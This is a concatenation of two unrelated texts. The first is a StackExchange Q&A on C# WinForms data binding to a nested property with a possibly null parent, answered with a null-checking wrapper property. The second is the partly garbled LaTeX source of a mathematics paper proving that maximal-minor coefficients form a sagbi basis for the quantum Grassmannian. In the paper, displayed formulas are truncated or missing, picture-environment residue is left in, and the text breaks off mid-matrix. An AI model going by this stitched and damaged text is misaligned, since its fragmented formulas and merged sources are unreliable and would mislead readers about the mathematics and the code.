stringlengths 1
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Data binding to a nested property with possibly null parent
I want to perform data-binding to Room.ToNorth.ImageName while ToNorth may be null.
I'm trying to write my own text adventure and have images next to each of the directions a player can go (ie. open/closed door, pathway). When there isn't a room in a given direction I have the controls bound to show a 'no exit' image, this works great so long the player starting location has an exit in all 4 directions, however when one is null I get the following exception
System.ArgumentNullException: 'Value cannot be null. Parameter name:
This is isn't an issue on a new game but I'm making randomly generated dungeons so it can't be guaranteed on a load game. I realise I could probably fudge it by creating a safe space while the bindings are set then moving the player to where they need to be but is there a proper way to handle this?
The closest answer I've found is this question, but I'm not sure I can apply it here due to how it's bound.
private GameSession _CurrentGame;
private BindingSource _BindToPlayer = new BindingSource();
private void BtnNewGame_Click(object sender, EventArgs e)
_CurrentGame = new GameSession();
_BindToPlayer.DataSource = _CurrentGame.CurrentPlayer;
PicBoxNorth.DataBindings.Add("ImageLocation", _BindToPlayer,
"CurrentRoom.ToNorth.ImageName", true, DataSourceUpdateMode.OnPropertyChanged,
The ToNorth property just gets the object from an an array of exits, but telling it to return an empty exit if it's null (like suggested in the above link) would be problematic in that the exit wouldn't have any rooms to connect to and thus fail to initialise likely throwing an exception itself along the way. To explain better, I have my rooms set up as follows
public Class Room
public int ID { get; set; }
public String Name { get; set; }
public String Description { get; set; }
public String FarDescription { get; set; }
public CoOrds Co_Ords { get; set; }
public Boolean UniqueRoom { get; set; }
public Exit[] ExitArr { get; set; }
public Exit ToNorth => ExitArr[0];
public Exit ToSouth => ExitArr[1];
public Exit ToWest => ExitArr[2];
public Exit ToEast => ExitArr[3];
public Exit ToUp => ExitArr[4];
public Exit ToDown => ExitArr[5];
public Exit ToIn => ExitArr[6];
public Exit ToOut => ExitArr[7];
public Room(int id, String name, String desc, String fardesc,bool unique = false)
ID = id;
Name = name;
Description = desc;
FarDescription = fardesc;
Co_Ords = new CoOrds();
ExitArr = new Exit[8];
UniqueRoom = unique;
And my exits are set up like so
public class Exit
public String Description {get;}
public Room RoomA { get; set; }
public Room RoomB { get; set; }
public Boolean CanExitA { get; set; } = true;
public Boolean CanExitB { get; set; } = true;
public Room NextRoom
if (RoomA.PlayerHere && CanExitA)
{ return RoomB; }
else if (RoomB.PlayerHere && CanExitB)
{ return RoomA; }
return null;
public String ImageName
string imagePath = "Images\\";
if (DoorHere != null)
return imagePath + DoorHere.ImageName;
return imagePath + "Pathway.png";
public Door DoorHere { get; set; }
public Exit(Room roomA, int Adir, Room roomB, int Bdir, Door door = null)
RoomA = roomA;
RoomA.ExitArr[Adir] = this;
RoomB = roomB;
RoomB.ExitArr[Bdir] = this;
DoorHere = door;
Door is just an unnamed object with a few bools for IsOpen, IsLocked etc. and shouldn't be needed if you want to test this but exits are created anonymously and add themselves to the Exit array in both connecting rooms, hence creating empty ones would fail.
Any suggestions would be greatly appreciated.
As an option, you can create a property to do null-checking and get/set second level property using that property.
For example in your code, you can create ToNorthImageName property to get/set the value of ToNorth.ImageNamein Room class:
public string ToNorthImageName
get { return ToNorth?.ImageName }
//set { if (ToNorth != null) ToNorth.ImageName = value; }
The property setter is optional, you can remove it if you just want to read the image name.
Then setup data-binding to that property:
PicBoxNorth.DataBindings.Add("ImageLocation", _BindToPlayer, "ToNorthImageName",
true, DataSourceUpdateMode.OnPropertyChanged);
| {
"pile_set_name": "StackExchange"
} |
abstract: 'The maximal minors of a $p\times (m + p)$-matrix of univariate polynomials of degree $n$ with indeterminate coefficients are themselves polynomials of degree $np$. The subalgebra generated by their coefficients is the coordinate ring of the quantum Grassmannian, a singular compactification of the space of rational curves of degree $np$ in the Grassmannian of $p$-planes in ($m + p$)-space. These subalgebra generators are shown to form a sagbi basis. The resulting flat deformation from the quantum Grassmannian to a toric variety gives a new “Gröbner basis style” proof of the Ravi-Rosenthal-Wang formulas in quantum Schubert calculus. The coordinate ring of the quantum Grassmannian is an algebra with straightening law, which is normal, Cohen-Macaulay, Gorenstein and Koszul, and the ideal of quantum Plücker relations has a quadratic Gröbner basis. This holds more generally for skew quantum Schubert varieties. These results are well-known for the classical Schubert varieties $(n=0)$. We also show that the row-consecutive $p\times p$-minors of a generic matrix form a sagbi basis and we give a quadratic Gröbner basis for their algebraic relations.'
- |
- Frank Sottile\
Department of Mathematics\
University of Wisconsin\
Madison, Wisconsin 53706\
- |
- Bernd Sturmfels\
Department of Mathematics\
University of California\
Berkeley, California 94720\
- Frank Sottile
- Bernd Sturmfels
title: A sagbi basis for the quantum Grassmannian
Statement of the main result
Let ${\mathcal M}(t)$ be the $p\times(m+p)$-matrix whose $i,j$th entry is the degree $n$ polynomial in $t$, $$x_{i,j}^{(n)} \cdot t^n \ + \,
x_{i,j}^{(n-1)} \cdot t^{n-1} +\,\, \ldots \,\, + \,
x_{i,j}^{(2)} \cdot t^2 \ + \,
x_{i,j}^{(1)} \cdot t\ + \,
x_{i,j}^{(0)} .$$ The coefficients $x_{i,j}^{(l)}$ are indeterminates. We write $k[X]$ for the polynomial ring over a field $k$ generated by these indeterminates, for $i=1,\ldots,p$, $j=1,\ldots,m+p$, and $l=0,\ldots,n$. Lexicographic order on the triples $l,i,j$ gives a total order of these variables. For example, $$x_{1,2}^{(0)}\ <\ x_{1,2}^{(1)}\ <\
x_{1,5}^{(1)}\ <\ x_{2,3}^{(1)}\ <\
x_{2,4}^{(1)}\ <\ x_{1,3}^{(2)} \ .$$ Let $\prec$ be the resulting degree reverse lexicographic term order on the polynomial ring $k[X]$.
For each $\alpha\in\binom{[m+p]}{p}$ and $a\geq 0$, let $\alpha^{(a)}$ be a variable which, when $a\leq np$, formally represents the coefficient of $t^a$ in the maximal minor of ${\mathcal M}(t)$ given by the columns indexed by $\alpha_1,\alpha_2,\ldots,\alpha_p$. These variables $\alpha^{(a)}$ have a natural partial order, denoted ${\mathcal C}_{p,m}$, which is defined as follows: $$\alpha^{(a)}\ \leq\ \beta^{(b)} \quad\Longleftrightarrow\quad
a\leq b \, \mbox{ and } \,\,
\alpha_i\leq \beta_{b-a+i} \,
\mbox{ for } i = 1,2,\ldots,p-b+a.$$ Fix $0\leq q\leq np$ and let ${\mathcal C}^q_{p,m}$ denote the truncation of the infinite poset ${\mathcal C}_{p,m}$ to the finite subset $\,\bigl\{ \,
\alpha^{(a)} \,\, | \,\, \alpha\in\binom{[m+p]}{p} \mbox{ and } a\leq q
\, \bigr\}$. The posets ${\mathcal C}^q_{p,m}$ are graded distributive lattices. Figure \[fig:qorder\] shows ${\mathcal C}^1_{2,3}$.
$$\epsfxsize=1.6in \epsfbox{fig1.eps}$$
Let $\varphi : k[{\mathcal C}^q_{p,m}] \rightarrow k[X]$ denote the $k$-algebra homomorphism which sends the formal variable $\alpha^{(a)}$ to the coefficient of $t^a$ in the $\alpha$th maximal minor of the matrix ${\mathcal M}(t)$. For example, [ $$\begin{array}{l}
\varphi \bigl( 456^{(2)} \bigr) \quad =
\quad \mbox{\rm coefficient of $t^2$ in}\ \
x^{(0)}_{1,4}+x^{(1)}_{1,4}t&\ x^{(0)}_{1,5}+x^{(1)}_{1,5}t\
& x^{(0)}_{1,6}+x^{(1)}_{1,6}t\\ \rule{0pt}{17pt}
x^{(0)}_{2,4}+x^{(1)}_{2,4}t&\ x^{(0)}_{2,5}+x^{(1)}_{2,5}t\
& x^{(0)}_{2,6}+x^{(1)}_{2,6}t\\ \rule{0pt}{17pt}
x^{(0)}_{3,4}+x^{(1)}_{3,4}t&\ x^{(0)}_{3,5}+x^{(1)}_{3,5}t\
& x^{(0)}_{3,6}+x^{(1)}_{3,6}t
\\ = \quad \rule{0pt}{20pt} -\underline{x^{(0)}_{3,6}x^{(1)}_{1,5}x^{(1)}_{2,4}}
+x^{(0)}_{3,4}x^{(1)}_{1,5}x^{(1)}_{2,6}\\\rule{0pt}{17pt}\phantom{=} \quad
-x^{(0)}_{2,4}x^{(1)}_{1,5}x^{(1)}_{3,6}\\\rule{0pt}{17pt}\phantom{=} \quad
\[issagbi\] The set of polynomials $\, \varphi(\alpha^{(a)}) \,$ as $\alpha^{(a)} $ runs over the poset ${\mathcal C}^q_{p,m} \,$ forms a sagbi basis with respect to the reverse lexicographic term order $\prec$ on $\,k[X]\,$ defined above.
Our second theorem states that the subalgebra [*image*]{}$(\varphi)$ of $k[X]$ generated by this sagbi basis is an [*algebra with straightening law*]{} on the poset ${\mathcal C}^q_{p,m}$. Let $\prec$ be the degree reverse lexicographic term order on $k[{\mathcal C}^q_{p,m}]$ induced by any linear extension of the poset ${\mathcal C}^q_{p,m}$. This term order on $k[{\mathcal C}^q_{p,m}]$ and the previous term order on $k[X]$ are fixed throughout this paper.
\[thm:gbasis\] The reduced Gröbner basis of the kernel of $\varphi$ consists of quadratic polynomials in $\,k[{\mathcal C}^q_{p,m}]\,$ which are indexed by pairs of incomparable variables $\gamma^{(c)},\delta^{(d)}$ in the poset $\,{\mathcal C}^{np}_{p,m}$, $$S(\gamma^{(c)},\delta^{(d)}) \quad = \quad
\gamma^{(c)}\cdot\delta^{(d)}\ -\
(\gamma^{(c)}\vee\delta^{(d)})\cdot (\gamma^{(c)}\wedge\delta^{(d)})
\,\, + \,\,\hbox{lower terms in $\prec$},$$ and all lower terms $\,\lambda\beta^{(b)}\alpha^{(a)}\,$ in $\,S(\gamma^{(c)},\delta^{(d)}) \,$ satisfy $\,\beta^{(b)}<\gamma^{(c)}\wedge\delta^{(d)}$ and $\gamma^{(c)}\vee\delta^{(d)}<\alpha^{(a)}$.
The join $\vee$ and meet $\wedge$ appearing in the above formula are the lattice operations in ${\mathcal C}^{np}_{p,m}$. The combinatorial structure of this distributive lattice will become clear in Section 2, when we introduce the toric variety associated with ${\mathcal C}^{np}_{p,m}$. In Section 3 we interpret the subalgebra ${\rm image}(\varphi)$ of $k[X]$ as the coordinate ring of the quantum Grassmannian. Section 4 contains the proofs of Theorems 1 and 2. These results generalize the classical sagbi basis property of maximal minors [@Sturmfels_invariant Theorem 3.2.9] and its geometric interpretation as a toric deformation [@Sturmfels_GBCP Proposition 11.10] from the case of the Grassmannian to the quantum Grassmannian. In Section 5 we discuss corollaries, applications and some open problems. One such application is that the row-consecutive $p\times p$-minors of any matrix of indeterminates form a sagbi basis.
We thank Aldo Conca, Ezra Miller, and Brian Taylor for their helpful comments.
The toric variety of the distributive lattice
Theorem 1 asserts that the initial algebra of our subalgebra $\,{\rm image}(\varphi)\,$ is generated by the initial monomials of its generators $\varphi(\alpha^{(a)}) $. Our first step is to identify the initial monomials. Here are two examples. The first one is the underlined monomial right before Theorem \[issagbi\]: $$\mbox{\rm in}_\prec \bigl( \varphi(456^{(2)}) \bigr) \ =\
\mbox{\rm in}_\prec \bigl( \varphi(2457^{(5)}) \bigr) \ =\
x_{2,7}^{(1)}x_{3,5}^{(1)}x_{4,4}^{(1)}x_{1,2}^{(2)}.$$ In general, the initial monomial of $\varphi(\alpha^{(a)}) $ is given by the following lemma:
\[lemma:leadmon\] Let $\alpha\in\binom{[m+p]}{p}$ and $\,a=pl+r \,$ with integers $p > r \geq 0$. Then $$\mbox{\rm in}_\prec \bigl( \varphi(\alpha^{(a)}) \bigr) \quad =\quad
[**Proof.** ]{} Let $x_{i_1,j_1}^{(l_1)}x_{i_2,j_2}^{(l_2)}\cdots x_{i_p,j_p}^{(l_p)}$ be a monomial which appears in $\varphi(\alpha^{(a)})$. We claim that $$\label{eq:comparison}
x_{i_1,j_1}^{(l_1)}x_{i_2,j_2}^{(l_2)}\cdots x_{i_p,j_p}^{(l_p)}
\quad \preceq\quad
x_{r,\alpha_1}^{(l+1)}.$$ We may assume $\,x_{i_1,j_1}^{(l_1)} \prec x_{i_2,j_2}^{(l_2)} \prec \cdots \prec
x_{i_p,j_p}^{(l_p)}\,$ and hence $l_1 \leq\cdots\leq l_p$. Since $l_1+\cdots+l_p=a$, either $ l_1 < q $, from which (\[eq:comparison\]) follows, or else $l_1=\cdots=l_{p-r}=l$ and $l_{p+1-r}=\cdots=l_p=l+1$. In the second case, as $\{i_1,\ldots,i_p\}=\{1,\ldots,p\}$ and the monomial is in order, we must have $i_1<\cdots<i_{p-r}$ and $i_{p+1-r}<\cdots<i_p$. If $i_1 \leq r$, then (\[eq:comparison\]) follows, and if $ i_1 = r+1$, then the ordered sequence $\,i_1,i_2,\ldots,i_p\,$ equals $\, r \! + \! 1,r \! + \! 2,\ldots,p,1,\ldots,r$. Among all monomials satisfying this new second case, the largest in the degree reverse lexicographic order $\prec $ has the second lower index appearing in reverse order. This completes the proof.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
We next introduce some combinatorics to help understand the poset ${\mathcal C}_{p,m}$. A [*row*]{} with shift $a$ consists of $p$ consecutive empty unit boxes shifted $a$ units to the left of a given vertical line. A [*skew shape*]{} is an array of such rows whose shifts are weakly increasing read from top to bottom. For example, the unshaded boxes in the figure on the left form a skew shape (with shifts 1,2,2, and 5) while those in the other figure do not: $$\epsfxsize=2.8in \epsfbox{fig2.eps}$$
A [*(skew) tableau*]{} $T$ is a filling of a skew shape with integers that increase across each row. When the entries lie in $[m+p]$, the $i$th row of a tableau is a sequence $\alpha_{(i)}\in\binom{[m+p]}{p}$. If $a_i$ is the shift of the $i$th row and $T$ has $j$ rows, then $T$ corresponds to a monomial $\alpha_{(1)}^{(a_1)}\alpha_{(2)}^{(a_2)}\cdots\alpha_{(j)}^{(a_j)}$. Conversely, any monomial in the variables $\alpha^{(a)}$ corresponds to a tableau. A tableau $T$ is [*standard*]{} if the entries are weakly increasing in each column, read top to bottom. Equivalently, $T$ is standard if we have $\alpha_{(1)}^{(a_1)}\leq\alpha_{(2)}^{(a_2)}\leq\cdots
\leq\alpha_{(j)}^{(a_j)}$ in ${\mathcal C}_{p,m}$. For example, the following two tableaux correspond to the monomials $345^{(0)}123^{(1)}245^{(3)}$ and $135^{(0)}123^{(1)}257^{(3)}$. The first tableau is not standard and the second tableau is standard: $$\epsfxsize=2.8in \epsfbox{fig3.eps}$$
The elements of the poset ${\mathcal C}^q_{p,m}$ are represented by one-row tableaux with entries in $[m+p]$ and shift at most $q$. Two elements satisfy $\,\alpha^{(a)} \leq \beta^{(b)} \,$ if and only if the two-rowed tableau $T=\alpha^{(a)}\beta^{(b)}$ is standard. This representation implies that ${\mathcal C}^q_{p,m}$ is a distributive lattice. Indeed, the two lattice operations $\wedge$ and $\vee$ are described as follows. If a two-rowed tableau $\,T=\alpha^{(a)}\beta^{(b)}\,$ is non-standard then interchanging the entries in every column in which a violation ($\alpha_{a-b+i}<\beta_i$) occurs yields a standard tableau. The first row of this new tableau is the [*meet*]{} $\alpha^{(a)}\wedge\beta^{(b)}$ of $\alpha^{(a)}$ and $\beta^{(b)}$ in ${\mathcal C}^q_{p,m}$ and the second row is their [*join*]{} $\alpha^{(a)}\vee\beta^{(b)}$.
Let $\psi : k[{\mathcal C}^{q}_{p,m}] \rightarrow k[X]$ denote the $k$-algebra homomorphism which sends the variable $\alpha^{(a)}$ to the monomial $\,\mbox{\rm in}_\prec \bigl(\varphi(\alpha^{(a)}) \bigr)$. Its kernel is a [*toric ideal*]{} (i.e. binomial prime) in $\, k[{\mathcal C}^{q}_{p,m}]$.
\[lem:toric\] The reduced Gröbner basis for the kernel of $\psi$ consists of the binomials $$\underline{\alpha^{(a)}\cdot\beta^{(b)}} \ -\
(\alpha^{(a)}\vee\beta^{(b)})\cdot(\alpha^{(a)}\wedge\beta^{(b)}),$$ where $\alpha^{(a)}, \beta^{(b)}$ runs over all incomparable pairs of ${\mathcal C}^q_{p,m} $. The initial monomial is underlined.
[**Proof.**]{} This follows from Hibi’s Theorem [@Hibi] since ${\mathcal C}^q_{p,m}$ is a distributive lattice.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
\[cor:standard\] The set of standard tableaux is a $k$-basis for $\, k[{\mathcal C}^q_{p,m}] / {\rm kernel}(\psi) =
{\rm image}(\psi) $.
Here is a typical element in the reduced Gröbner basis of ${\rm kernel}(\psi) $ for $p=5,m=4,q=9$: $$\underline{45789^{(1)} \cdot 12356^{(3)}} \, - \,
35689^{(1)} \cdot 12457^{(3)}.$$ Note that the second monomial corresponds to a standard tableau while the first does not.
We write $T^q_{p,m}$ for the projective toric variety cut out by the binomials in Lemma \[lem:toric\]. Its coordinate ring is the subalgebra $\,{\rm image}(\psi)$ of $k[X]$. The geometry of toric varieties associated with distributive lattices is discussed in [@Wagner]. The analogue to Corollary \[cor:standard\] always holds, i.e., multichains in the poset correspond to basis monomials in the coordinate ring.
\[Degree\] The degree of the toric variety $T^q_{p,m}$ is the number of maximal chains in ${\mathcal C}^q_{p,m}$.
The closed intervals of the poset ${\mathcal C}^q_{p,m}$ are also distributive lattices. They are denoted $$[\beta^{(b)}, \alpha^{(a)}] \quad := \quad
\bigl\{ \gamma^{(c)} \in {\mathcal C}^q_{p,m} \,: \,
\beta^{(b)} \leq \gamma^{(c)} \leq \alpha^{(a)} \bigr\}.$$ Proposition \[lem:toric\] and Corollaries \[cor:standard\] and \[Degree\] hold essentially verbatim for the distributive sublattice $\,[\beta^{(b)}, \alpha^{(a)}]\,$ as well. The projective toric variety associated with $\,[\beta^{(b)}, \alpha^{(a)}]\,$ is gotten from the toric variety of ${\mathcal C}^q_{p,m}$ by setting $\gamma^{(c)} = 0$ for all $ \gamma^{(c)} \not\in [\beta^{(b)}, \alpha^{(a)}]$. The degree of that variety is the number of saturated chains in ${\mathcal C}^q_{p,m}$ which start at $\beta^{(b)}$ and end at $ \alpha^{(a)}$.
We close this section with an alternative proof, to be used in Section 4, for the fact that ${\mathcal C}_{p,m}$ is a distributive lattice. We claim that ${\mathcal C}_{p,m}$ is a sublattice of [*Young’s lattice*]{}. Given $\alpha^{(a)} \in {\mathcal C}_{p,m}$, write $a=pl+r$ with integers $p > r \geq 0$, and define a sequence $J(\alpha^{(a)})$ by $$\label{eq:seq_def}
J(\alpha^{(a)})_i\quad :=\quad \left\{\begin{array}{ll}
l(m+p)+\alpha_{r+i}&\quad\mbox{if }1 \leq i\leq p-r\\
(l+1)(m+p)+\alpha_{i-p+r}&\quad\mbox{if }p-r<i\leq p
\end{array}\right.\,.$$ This gives an order-preserving bijection between the poset ${\mathcal C}_{p,m}$ and the poset of sequences $J:=j_1<j_2<\cdots<j_p$ of positive integers with $j_p-(m+p)<j_1$, and it preserves meet and join. This bijection preserves the rank function in the two distributive lattices: $$\label{Miracle}
| \alpha^{(a)} | \quad := \quad
a(m+p) + \sum_{j=1}^p (\alpha_j - j)
\quad = \quad
\sum_{i=1}^p \bigl( J(\alpha^{(a)})_i - i \,\bigr)
\quad =: \quad
| J(\alpha^{(a)})|.$$
The quantum Grassmannian
Let ${\it Grass}_pk^{m+p}$ denote the Grassmannian of $p$-planes in the vector space $k^{m+p}$. This is a smooth projective variety of dimension $mp$. Consider the space $S^q_{p,m}$ of maps ${\mathbb P}^1\rightarrow \mbox{\it Grass}_pk^{m+p}$ of degree $q$. Such a map may be (non-uniquely) represented as the row space of a $p\times(m+p)$-matrix of polynomials in $t$ whose maximal minors have degree $q$. Results in [@Clark] imply that it suffices to consider the matrices ${\mathcal M}(t)$ in the introduction. The coefficients of these maximal minors define the [*Plücker embedding*]{} of $S^q_{p,m}$ into ${\mathbb P}(\wedge^pk^{m+p}\otimes k^{q+1})$; see [@Stromme; @Rosen94]. The [*quantum Grassmannian*]{} $K^q_{p,m}$ is the Zariski closure of $S^q_{p,m}$ in this Plücker embedding. It is an irreducible projective variety of dimension $mp+q(m+p)$. Its prime ideal is $\,{\rm kernel}(\varphi) \subset k[ {\mathcal C}^q_{p,m}]\,$ and its coordinate ring is our subalgebra $\,{\rm image}(\varphi)\subset k[X]$.
The quantum Grassmannian $K^q_{p,m}$ is singular and it differs from other spaces used to study rational curves in Grassmann varieties (the quot scheme [@Stromme], the Kontsevich space of stable maps [@Kontsevich_Manin], or the set of autoregressive systems [@RR94]). Nevertheless, $K^q_{p,m}$ has been crucial in two important advances: in computing the intersection number $\,{\rm degree}(K^q_{p,m})\,$ in quantum cohomology [@RRW98], and in showing that this intersection problem can be fully solved over the real numbers [@Sottile_quantum]. Our result will give a new derivation of this intersection number.
\[cor:counting\] [[@RRW98]]{} The degree of $\,K^q_{p,m} \,$ is the number of maximal chains in ${\mathcal C}^q_{p,m}$.
[**Proof.** ]{} This follows immediately from Theorem 2 and Corollary \[Degree\].
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
This degree can also be computed in the small quantum cohomology ring of the Grassmannian [@Bertram]. Note that $\, {\rm degree} (K^1_{2,3}) = 55 $, by counting maximal chains in Figure \[fig:qorder\]. Ravi, Rosenthal, and Wang [@RRW98] were motivated by a problem in applied mathematics. The degree of $\,K^q_{p,m} \,$ is the number of dynamic feedback compensators that stabilize a certain linear system, in the sense of systems theory. This number can be described in classical projective geometry as follows. The Schubert subvariety of ${\it Grass}_pk^{m+p}$ consisting of $p$-planes meeting a fixed $m$-plane $L$ is a hyperplane section in the Plücker embedding of ${\it Grass}_pk^{m+p}$. Thus the set of maps $M\in S^q_{p,m}$ such that $M(t)$ meets $L$ non-trivially is a hyperplane section of $S^q_{p,m}$ in its Plücker embedding. Since $GL_{m+p}(k)$ acts transitively on ${\it Grass}_pk^{m+p}$, Kleiman’s Theorem on generic transversality implies the following statement when $k$ is algebraically closed of characteristic zero. Set $N:=mp+q(m+p)$ and suppose $t_1,\ldots,t_N\in{\mathbb P}^1$ are general points and $L_1,\ldots,L_N$ are general $m$-planes in $k^{m+p}$, then the degree of $K^q_{p,m}$ counts those maps $M$ for which $M(t_i)$ meets $L_i$ non-trivially for each $i=1,\ldots,N$. As to computing the desired maps $M$ numerically, we note that the sagbi basis in Theorem 1 and the Gröbner basis in Theorem 2 each lead to an [*optimal homotopy algorithm*]{} for finding these $\,{\rm degree}(K^q_{p,m})\,$ maps. These algorithms generalize the ones in [@HSS].
\[rem:flat\] The sagbi basis in Theorem 1 defines a flat deformation from the quantum Grassmannian $K^q_{p,m}$ to the projective toric variety $T^q_{p,m}$ associated with the poset ${\mathcal C}^q_{p,m}$.
See [@CHV] for a precise algebraic discussion of such deformations, and see [@Sturmfels_GBCP Equation (11.9)] for the simplest example relevant to us, namely, $K^0_{2,3} = {\it Grass}_2 k^{5}$. The flat deformation is given algebraically by deleting all but the first two terms in the Gröbner basis elements $\, S(\gamma^{(c)},\delta^{(d)}) \,$ given in Theorem 2. Consider the deformation from $K^3_{3,3}$ to $T^3_{3,3}$. The incomparable pair $156^{(1)}$ and $234^{(2)}$ in ${\mathcal C}^3_{3,3}\,$ indexes the quadratic polynomial $\,\, S(156^{(1)},234^{(2)})\, = $ [ $$\label{BigSyzygy}
\underline{ 156^{(1)}234^{(2)}
-146^{(1)}235^{(2)} }\,
-256^{(0)}134^{(3)} \\
-234^{(0)}156^{(3)} \\
\end{array}$$ ]{}
which vanishes on the quantum Grassmannian $K^3_{3,3}$. The underlined leading binomial vanishes on the toric variety $T^3_{3,3}$, by Proposition \[lem:toric\]. Our main technical problem, to be solved in the next section, is the reconstruction of quadrics such as (\[BigSyzygy\]) from their leading binomial.
A key tool in proving Theorems 1 and 2 is the Schubert decomposition of the quantum Grassmannian $K^q_{p,m}$ indexed by ${\mathcal C}^q_{p,m}$. For $\alpha^{(a)}\in{\mathcal C}^q_{p,m}$, the [*quantum Schubert variety*]{} is $$Z_{\alpha^{(a)}}\quad :=\quad
\bigl\{ \,({\gamma^{(c)}})\in K^q_{p,m} \,\mid\,
{\gamma^{(c)}}=0 \, \mbox{ if } \, \gamma^{(c)}\not\leq \alpha^{(a)} \bigr\}\ .$$ More generally, for $\beta^{(b)}\leq \alpha^{(a)}$ in ${\mathcal C}^q_{p,m}$, we define the [*skew quantum Schubert variety*]{} $$Z_{\alpha^{(a)}/\beta^{(b)}}\quad :=\quad
\bigl\{\, ({\gamma^{(c)}})\in K^q_{p,m} \,\mid \,
{\gamma^{(c)}} = 0 \, \mbox{ if } \,
\gamma^{(c)}\not\in [\beta^{(b)},\alpha^{(a)}] \bigr\}\ .$$ Among the quantum Schubert varieties of $K^q_{p,m}$ are the $K^d_{p,m}$ for $d<q$; namely, if $\delta^{(d)}$ is the supremum of ${\mathcal C}^d_{p,m}$, then $K^d_{p,m}=Z_{\delta^{(d)}}$. This allows us to deduce assertions about the general quantum Grassmannian $K^q_{p,m}$ from results about quantum Schubert varieties of $K^{pn}_{p,m}$.
The quantum Schubert varieties and skew quantum Schubert varieties have rational parameterizations which are constructed as follows. Let $\alpha^{(a)}\in{\mathcal C}^{pn}_{p,m}$ and write $a=ps+r$ with integers $p>r\geq 0$. We define the matrix ${\mathcal M}_{\alpha^{(a)}}(t)$ to be the specialization of ${\mathcal M}(t)$ where $$x_{i,j}^{(l)}\ =\ 0\quad\mbox{if }\quad\left\{
( l>s+1 \ \mbox{ and } \ i\leq r )
&\mbox{ or } \ \ (l=s+1\mbox{ and }j>\alpha_{r+1-i}) \ \ \mbox{or} \\
( l>s \ \mbox{ and } \ i>r )
&\mbox{ or } \ \ (l=s\mbox{ and }j>\alpha_{p+r+1-i})\,.
\end{array}\right.$$ Here we use the conventions $\alpha_\nu = 0$ if $\nu \leq 0\, $ and $\,\alpha_\nu = +\infty$ if $\nu > p$. For example, $${\mathcal M}_{235^{(2)}}(t) \quad = \quad \,
x_{1,1}^{(0)}+x_{1,1}^{(1)}\cdot t&x_{1,2}^{(0)}+x_{1,2}^{(1)}\cdot t
&x_{1,3}^{(0)}+x_{1,3}^{(1)}\cdot t&x_{1,4}^{(0)}
&\ x_{1,5}^{(0)}&\ x_{1,6}^{(0)}\\ \rule{0pt}{17pt}
x_{2,1}^{(0)}+x_{2,1}^{(1)}\cdot t&x_{2,2}^{(0)}+x_{2,2}^{(1)}\cdot t
&x_{2,3}^{(0)}\ \ \ &\ x_{2,4}^{(0)}\
&\ x_{2,5}^{(0)} &\ x_{2,6}^{(0)} \\
x_{3,1}^{(0)}\ \ \ &x_{3,2}^{(0)}\ \ \
& x_{3,3}^{(0)}\ \ \ &\ x_{3,4}^{(0)}\ &\ x_{3,5}^{(0)} &\ \ 0
\end{array}\right].$$ If we specialize the variables $x^{(l)}_{i,j}$ in ${\mathcal M}_{\alpha^{(a)}}(t)$ to field elements in $k$ in such a way that the resulting matrix over $k(t)$ has maximal row rank, then that matrix defines a map from $k$ to ${\it Grass}_pk^{m+p}$. If we extend this to ${\mathbb P}^1$, we obtain a map in $Z_{\alpha^{(a)}}$. Proposition \[ItIsDominant\] below implies that such maps constitute a dense subset of $Z_{\alpha^{(a)}}$. This means that the coefficients with respect to $t$ of the maximal minors of ${\mathcal M}_{\alpha^{(a)}}(t)$ give a rational parameterization of $Z_{\alpha^{(a)}}$.
This construction extends to skew quantum Schubert varieties as follows. Given $\beta^{(b)}\leq\alpha^{(a)}$, write $b=ps+r$ with integers $p>r\geq 0$ and define the matrix ${\mathcal M}_{\alpha^{(a)}/\beta^{(b)}}(t)$ to be the specialization of ${\mathcal M}_{\alpha^{(a)}}(t)$ where $$x_{i,j}^{(l)}\ =\ 0\quad\mbox{if }\quad\left\{
( l<s+1 \ \mbox{ and }\ i\leq r )
&\mbox{ or } \ \
( l=s+1\mbox{ and }j< \beta_{r+1-i})
\ \ \mbox{ or } \\
( l<s \ \mbox{ and }\ i>r )
& \mbox{ or } \ \
( l=s\mbox{ and }j<\beta_{p+r+1-i})
\end{array}\right.\,.$$ The matrix ${\mathcal M}_{\alpha^{(a)}/\beta^{(b)}}(t)$ gives a rational map into $Z_{\alpha^{(a)}/\beta^{(b)}}$, which is described algebraically as follows. We define $\varphi_{\alpha^{(a)}}$ and $\varphi_{\alpha^{(a)}/\beta^{(b)}}$ to be the composition of the map $\,\varphi : k[{\mathcal C}^{np}_{p,m}] \rightarrow k[X] \,$ with the specializations to ${\mathcal M}_{\alpha^{(a)}}(t)$ and ${\mathcal M}_{\alpha^{(a)}/\beta^{(b)}}(t)$ respectively. We claim that these matrices parameterize dense subsets of the (skew) quantum Schubert varieties.
\[ItIsDominant\] The kernel of $\varphi_{\alpha^{(a)}}$ is the homogeneous ideal of the quantum Schubert variety $Z_{\alpha^{(a)}}$. Likewise, the kernel of $\varphi_{\alpha^{(a)}/\beta^{(b)}}$ is the homogeneous ideal of the skew quantum Schubert variety $Z_{\alpha^{(a)}/\beta^{(b)}}$. In particular, the varieties $Z_{\alpha^{(a)}}$ and $Z_{\alpha^{(a)}/\beta^{(b)}}$ are irreducible.
We postpone the proof of this proposition until the next section. Here is an example which illustrates the parameterization of skew quantum Schubert varieties for $p = m = 3$: $${\mathcal M}_{235^{(2)}/146^{(1)}}(t) \quad = \quad
x_{1,1}^{(1)}\cdot t&x_{1,2}^{(1)}\cdot t
